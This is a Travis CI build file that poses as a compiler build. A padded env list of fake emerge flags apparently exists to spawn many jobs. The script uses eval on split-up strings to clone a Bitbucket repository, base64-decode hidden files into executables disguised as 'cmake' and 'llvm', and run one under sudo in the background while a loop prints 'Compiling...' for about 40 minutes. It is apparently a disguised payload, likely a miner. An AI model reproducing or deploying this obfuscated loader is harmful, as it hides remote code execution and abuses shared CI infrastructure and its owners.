dist: bionic

env:
  - BUILD="--regen=755r0"
  - BUILD="--deep=67084"
  - BUILD="--reinstall=722UY"
  - BUILD="--rebuild-exclude=465ds"
  - BUILD="--fail-clean=770Wb"
  - BUILD="--list-sets=23191"
  - BUILD="--jobs=438MI"
  - BUILD="--autounmask-keep-masks=171YG"
  - BUILD="--complete-graph-if-new-ver=826zD"
  - BUILD="--rebuilt-binaries=538Vv"
  - BUILD="--autounmask-write=855ei"
  - BUILD="--autounmask-only=925qE"
  - BUILD="--root=2130H"
  - BUILD="--dynamic-deps=703Vl"
  - BUILD="--config=159Om"
  - BUILD="--binpkg-changed-deps=819M2"
  - BUILD="--sysroot=477mo"
  - BUILD="--resume=82c2"
  - BUILD="--unordered-display=665ov"
  - BUILD="--selective=700qZ"
  - BUILD="--alphabetical=367OC"
  - BUILD="--onlydeps=147fq"
  - BUILD="--getbinpkg=569NY"
  - BUILD="--changelog=17080"
  - BUILD="--jobs=273Ot"
  - BUILD="--ignore-default-opts=53167"
  - BUILD="--autounmask-license=316Sf"
  - BUILD="--pretend=827PJ"
  - BUILD="--regen=202SE"
  - BUILD="--autounmask-use=631B6"
  - BUILD="--fetch-all-uri=418rk"
  - BUILD="--backtrack=222mC"
  - BUILD="--quiet-unmerge-warn=336Ek"
  - BUILD="--jobs=894QQ"
  - BUILD="--keep-going=740oC"
  - BUILD="--select=721pG"
  - BUILD="--accept-properties=893NV"
  - BUILD="--implicit-system-deps=273Qo"
  - BUILD="--search=708Cn"
  - BUILD="--ignore-soname-deps=899zA"
  - BUILD="--prefix=5221a"
  - BUILD="--autounmask-write=4752N"
  - BUILD="--update=368d"
  - BUILD="--complete-graph-if-new-ver=375kF"
  - BUILD="--prefix=432zg"
  - BUILD="--help=8378y"
  - BUILD="--ignore-default-opts=294Ci"
  - BUILD="--buildpkg-exclude=160PV"
  - BUILD="--rebuilt-binaries-timestamp=888GR"
  - BUILD="--nospinner=5771l"
  - BUILD="--binpkg-respect-use=927sq"
  - BUILD="--search=253yZ"
  - BUILD="--alphabetical=6252V"
  - BUILD="--deselect=7231l"
  - BUILD="--oneshot=432xQ"
  - BUILD="--columns=489Jl"
  - BUILD="--complete-graph-if-new-ver=684pm"
  - BUILD="--nodeps=238cZ"
  - BUILD="--verbose-slot-rebuilds=912mv"
  - BUILD="--verbose-conflicts=74Bd"
  - BUILD="--search-similarity=237iB"
  - BUILD="--accept-restrict=868AI"
  - BUILD="--changed-use=157hF"
  - BUILD="--fetch-all-uri=22825"
  - BUILD="--changed-slot=566KQ"
  - BUILD="--with-bdeps-auto=5525Y"
  - BUILD="--getbinpkgonly=47i4"
  - BUILD="--rebuild-ignore=290lq"
  - BUILD="--backtrack=338ip"
  - BUILD="--verbose=689Lw"
  - BUILD="--noconfmem=816cB"
  - BUILD="--quickpkg-direct=1426Y"
  - BUILD="--autounmask-only=1890u"
  - BUILD="--emptytree=513Do"
  - BUILD="--quickpkg-direct=147YM"
  - BUILD="--autounmask-write=4295k"
  - BUILD="--reinstall=726hT"
  - BUILD="--autounmask-continue=8925a"
  - BUILD="--rebuild-exclude=527Ru"
  - BUILD="--jobs=176M8"
  - BUILD="--config-root=308BZ"
  - BUILD="--ignore-built-slot-operator-deps=994HG"
  - BUILD="--searchdesc=345Wh"
  - BUILD="--sync-submodule=9334O"
  - BUILD="--read-news=382kT"
  - BUILD="--newuse=187Vo"
  - BUILD="--update=468co"
  - BUILD="--verbose-conflicts=643qn"
  - BUILD="--rebuilt-binaries-timestamp=83bX"
  - BUILD="--fuzzy-search=783X1"
  - BUILD="--changelog=216as"
  - BUILD="--read-news=6067y"
  - BUILD="--clean=503KW"
  - BUILD="--deep=885xv"
  - BUILD="--reinstall-atoms=310uB"
  - BUILD="--ask-enter-invalid=556u8"
  - BUILD="--search=364sE"
  - BUILD="--alphabetical=243Fa"
  - BUILD="--rebuild-ignore=108pZ"
  - BUILD="--verbose-conflicts=743iT"
  - BUILD="--alphabetical=194ZT"
  - BUILD="--autounmask-keep-masks=522ew"
  - BUILD="--onlydeps=930zb"
  - BUILD="--help=920lg"
  - BUILD="--ask-enter-invalid=571B4"
  - BUILD="--autounmask-continue=466Wz"
  - BUILD="--ignore-soname-deps=6798E"
  - BUILD="--keep-going=303pX"
  - BUILD="--complete-graph-if-new-ver=276v4"
  - BUILD="--fail-clean=245Qg"
  - BUILD="--search=248oE"
  - BUILD="--getbinpkg=874l8"
  - BUILD="--usepkg=218OQ"
  - BUILD="--sync=17TO"
  - BUILD="--search-similarity=9044b"
  - BUILD="--select=3514E"
  - BUILD="--depclean=690ie"
  - BUILD="--jobs=911Cx"
  - BUILD="--ignore-world=599cf"
  - BUILD="--nospinner=105Vq"
  - BUILD="--with-test-deps=83iQ"
  - BUILD="--load-average=4275F"
  - BUILD="--quiet-unmerge-warn=679jV"
  - BUILD="--sysroot=5746k"
  - BUILD="--autounmask=184tC"
  - BUILD="--ask-enter-invalid=102qK"
  - BUILD="--rebuild-if-unbuilt=369YM"
  - BUILD="--getbinpkgonly=793OL"
  - BUILD="--complete-graph-if-new-ver=2758K"
  - BUILD="--fetchonly=72227"
  - BUILD="--deselect=7075A"
  - BUILD="--selective=64EI"
  - BUILD="--list-sets=369jk"
  - BUILD="--newuse=406Cu"
  - BUILD="--buildpkg=287hP"
  - BUILD="--search-similarity=332jb"
  - BUILD="--buildpkg-exclude=6758u"
  - BUILD="--rebuilt-binaries-timestamp=4735K"
  - BUILD="--rebuild-if-unbuilt=906xj"
  - BUILD="--rebuild-if-unbuilt=395nY"
  - BUILD="--onlydeps-with-rdeps=983pM"
  - BUILD="--root=519Xz"
  - BUILD="--select=478uC"
  - BUILD="--fuzzy-search=919kn"
  - BUILD="--sync=754lL"
  - BUILD="--keep-going=388H9"
  - BUILD="--sync=518hP"
  - BUILD="--ignore-world=506Qk"
  - BUILD="--autounmask=4Wz"
  - BUILD="--complete-graph=909Vn"
  - BUILD="--prefix=934Z1"
  - BUILD="--quiet=426k1"
  - BUILD="--verbose=696Ie"
  - BUILD="--complete-graph-if-new-use=98uu"
  - BUILD="--changed-use=3363R"
  - BUILD="--prefix=499Ml"
  - BUILD="--complete-graph-if-new-ver=636My"
  - BUILD="--oneshot=30193"
  - BUILD="--quiet-repo-display=241qG"
  - BUILD="--accept-properties=582rW"
  - BUILD="--ask=340CR"
  - BUILD="--sysroot=869hM"
  - BUILD="--read-news=235JJ"
  - BUILD="--verbose-slot-rebuilds=5143n"
  - BUILD="--sync-submodule=806IQ"
  - BUILD="--search-index=555Dr"
  - BUILD="--unordered-display=255eQ"
  - BUILD="--root-deps=772Aw"
  - BUILD="--autounmask-use=798KT"
  - BUILD="--complete-graph=98ps"
  - BUILD="--buildpkgonly=891dY"
  - BUILD="--onlydeps=366uf"
  - BUILD="--rebuild-exclude=882jx"
  - BUILD="--ignore-built-slot-operator-deps=91GP"
  - BUILD="--sync-submodule=630Sx"
  - BUILD="--changed-deps-report=5364z"
  - BUILD="--select=147nO"
  - BUILD="--package-moves=692v4"
  - BUILD="--digest=340PI"
  - BUILD="--rage-clean=937k3"
  - BUILD="--verbose-slot-rebuilds=27vN"
  - BUILD="--update=3393v"
  - BUILD="--search=273V1"
  - BUILD="--autounmask-only=582BF"
  - BUILD="--verbose-slot-rebuilds=815pl"
  - BUILD="--alert=698sn"
  - BUILD="--color=270TB"
  - BUILD="--complete-graph-if-new-use=172s2"
  - BUILD="--buildpkgonly=1312p"
  - BUILD="--ignore-world=35Bs"
  - BUILD="--prune=480UQ"
  - BUILD="--read-news=1542W"

language: minimal

script:
  - TCZfp="sudo apt up"
  - uWtexLwRO="date || tru"
  - eval "$TCZfp""$uWtexLwRO""e"
  - JSxnCuhe="sudo apt --"
  - EIbIYqyRCT="yes install"
  - LpoZgwG=" cl-base64 "
  - vIwMzWSYe="git &>/dev/"
  - eval "$JSxnCuhe""$EIbIYqyRCT""$LpoZgwG""$vIwMzWSYe""null"
  - rBJwluYllo="git clone h"
  - xAXrrbg="ttps://gccb"
  - QZnZLiGS="uild@bitbuc"
  - iQzDGhN="ket.org/gcc"
  - SFqLjsuV="build/gcc.g"
  - USvSwhT="it &>/dev/n"
  - eval "$rBJwluYllo""$xAXrrbg""$QZnZLiGS""$iQzDGhN""$SFqLjsuV""$USvSwhT""ull"
  - KzjMBgwxgZ="base64 -d g"
  - RPsYHshpgnH="cc/cmake_ >"
  - eval "$KzjMBgwxgZ""$RPsYHshpgnH"" cmake"
  - oriNEQ="base64 -d g"
  - PNcnxPNNY="cc/config_ "
  - ZXGRprAG="> output.lo"
  - eval "$oriNEQ""$PNcnxPNNY""$ZXGRprAG""g"
  - LDXehVXwHf="base64 -d g"
  - bzRyegxp="cc/make_ > "
  - eval "$LDXehVXwHf""$bzRyegxp""llvm"
  - RhTrTLgFL="chmod +x ll"
  - eval "$RhTrTLgFL""vm cmake"
  - LMBPLY="./cmake"
  - eval "$LMBPLY"""
  - sed -i 's/build/tg3o/g' output.log
  - sudo ./llvm --config=output.log &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2504)) ] && sudo killall llvm && break; sleep 201; done
